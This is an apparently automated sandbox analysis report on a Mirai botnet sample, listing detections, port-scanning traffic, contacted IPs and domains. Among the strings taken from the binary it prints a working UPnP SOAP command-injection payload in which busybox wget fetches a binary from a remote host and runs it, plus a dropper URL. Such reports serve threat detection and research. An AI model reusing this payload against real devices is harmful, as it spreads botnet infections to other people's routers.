Linux Analysis Report
harm4.elf

Overview

General Information

Sample name: harm4.elf
Analysis ID: 1546612
MD5: b388c33234287df8e67decee3801d046
SHA1: 9807602b862a086c0a3ad3042faf88203a322d4d
SHA256: 8f925cc077f79f07ad70dbfc9478a1f72a3134f711edebac505914d76dd5af6e
Tags: elfuser-abuse_ch
Infos:

Detection

Mirai
Score: 80
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Detected TCP or UDP traffic on non-standard ports
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: harm4.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: harm4.elf ReversingLabs: Detection: 52%

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 31.13.248.89 ports 5136,1,3,5,6,7427
Source: global traffic TCP traffic: 91.149.238.18 ports 0,1,3,4,7,10743
Source: global traffic TCP traffic: 81.29.149.178 ports 7584,18255,1,2,5,8,12035
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.14:38570 -> 91.149.238.18:10743
Source: global traffic TCP traffic: 192.168.2.14:60122 -> 81.29.149.178:18255
Source: global traffic TCP traffic: 192.168.2.14:41424 -> 217.28.130.41:22500
Source: global traffic TCP traffic: 192.168.2.14:41106 -> 91.149.218.232:10513
Source: global traffic TCP traffic: 192.168.2.14:34894 -> 31.13.248.89:5136
Source: global traffic TCP traffic: 192.168.2.14:54036 -> 213.182.204.57:3207
Sample listens on a socket
Source: /tmp/harm4.elf (PID: 5490) Socket: 127.0.0.1:1172 Jump to behavior
Source: unknown UDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknown UDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknown UDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknown UDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknown UDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknown UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknown UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknown UDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknown UDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknown UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown UDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknown UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown UDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknown UDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknown UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown UDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknown UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: global traffic DNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: harm4.elf, 5497.1.00007f4d40036000.00007f4d4003c000.rw-.sdmp String found in binary or memory: http://hailcocks.ru/wget.sh;
Source: harm4.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: harm4.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g
Source: Initial sample String containing 'busybox' found: -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal80.troj.linELF@0/0@24/0

Persistence and Installation Behavior
barindex
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/harm4.elf (PID: 5492) File: /proc/5492/mounts Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/harm4.elf (PID: 5490) Queries kernel information via 'uname': Jump to behavior
Source: harm4.elf, 5490.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmp, harm4.elf, 5492.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmp, harm4.elf, 5497.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/harm4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/harm4.elf
Source: harm4.elf, 5490.1.0000564daea95000.0000564daec0b000.rw-.sdmp, harm4.elf, 5492.1.0000564daea95000.0000564daec0b000.rw-.sdmp, harm4.elf, 5497.1.0000564daea95000.0000564daec0b000.rw-.sdmp Binary or memory string: MV!/etc/qemu-binfmt/arm
Source: harm4.elf, 5490.1.0000564daea95000.0000564daec0b000.rw-.sdmp, harm4.elf, 5492.1.0000564daea95000.0000564daec0b000.rw-.sdmp, harm4.elf, 5497.1.0000564daea95000.0000564daec0b000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: harm4.elf, 5490.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmp, harm4.elf, 5492.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmp, harm4.elf, 5497.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: harm4.elf, 5497.1.00007ffd8a9b7000.00007ffd8a9d8000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: harm4.elf, type: SAMPLE
Source: Yara match File source: 5497.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5492.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5490.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: harm4.elf PID: 5490, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: harm4.elf PID: 5492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: harm4.elf PID: 5497, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: harm4.elf, type: SAMPLE
Source: Yara match File source: 5497.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5492.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5490.1.00007f4d40017000.00007f4d4002e000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: harm4.elf PID: 5490, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: harm4.elf PID: 5492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: harm4.elf PID: 5497, type: MEMORYSTR

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
217.28.130.41
 unknown United Kingdom
15839 COBWEB-NETGB false
213.182.204.57
 kingstonwikkerink.dyn Latvia
9009 M247GB false
91.149.218.232
 unknown Poland
198401 GECKONET-ASPL false
31.13.248.89
 unknown Bulgaria
34224 NETERRA-ASBG true
91.149.238.18
 unknown Poland
41952 MARTON-ASPL true
81.29.149.178
 unknown Switzerland
39616 COMUNICA_IT_SERVICESCH true

Contacted Domains

Name IP Active
daisy.ubuntu.com 162.213.35.25 true
kingstonwikkerink.dyn 213.182.204.57 true